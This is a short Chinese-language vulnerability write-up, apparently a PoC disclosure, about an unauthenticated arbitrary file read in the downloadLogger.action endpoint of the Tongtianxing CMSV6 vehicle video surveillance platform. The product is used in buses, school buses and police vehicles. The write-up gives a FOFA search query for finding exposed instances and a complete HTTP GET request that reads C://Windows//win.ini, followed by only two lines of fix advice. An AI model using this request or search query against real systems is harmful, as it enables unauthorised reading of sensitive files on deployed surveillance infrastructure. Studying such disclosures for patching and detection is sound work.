0x01 产品简介
通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。
0x02 漏洞概述
通天星CMSV6车载视频监控平台 downloadLogger.action接口处任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取系统内部敏感文件信息,使系统处于极不安全状态。
0x03 复现环境
FOFA:body="/808gps/"
0x04 漏洞复现
PoC
GET /808gps/logger/downloadLogger.action?fileName=C://Windows//win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20172209 Firefox/103.0
Connection: close
Accept: */*
Accept-Encoding: gzip
读取C://Windows//win.ini
0x05 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本